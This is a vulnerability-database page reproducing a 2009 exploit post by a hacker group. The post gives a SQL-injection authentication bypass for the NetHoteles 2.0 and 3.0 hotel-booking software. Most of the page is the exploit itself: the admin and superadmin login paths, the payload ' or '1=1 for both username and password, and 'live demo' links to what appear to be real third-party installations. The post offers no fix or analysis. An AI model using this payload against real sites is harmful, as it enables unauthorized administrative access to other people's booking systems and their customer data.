NetHoteles 2.0/3.0 - Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057697 漏洞类型
发布时间 2009-04-16 更新时间 2009-04-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8449
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#############################################################################
#                                                			    #
#           NetHoteles v3.0 (Auth Bypass) Remote Sql Injecion               #
#                                                			    #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX


#############################################################################

---+-- Star --+---

[~] Expl0!T -1- For SuperAdmin  :

http://site.ir/superadmin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://internationalhotelbooking.com/demo/superadmin/

#############################################################################

[~] Expl0!T -2- For Admin :

http://site.ir/admin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://internationalhotelbooking.com/demo/admin/
----------------------------------------------

---+-- End --+---

--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+

#############################################################################


#############################################################################
#                                                			    #
#           NetHoteles v2.0 (Auth Bypass) Remote Sql Injecion               #
#                                                			    #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX


#############################################################################

---+-- Star --+---

[~] Expl0!T -1- For SuperAdmin  :

http://site.ir/superadmin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://www.sierracazorla.com/nethoteles/superadmin/

#############################################################################

[~] Expl0!T -2- For Admin :

http://site.ir/admin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://www.sierracazorla.com/nethoteles/admin/
----------------------------------------------

---+-- End --+---

--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+

#############################################################################

# milw0rm.com [2009-04-16]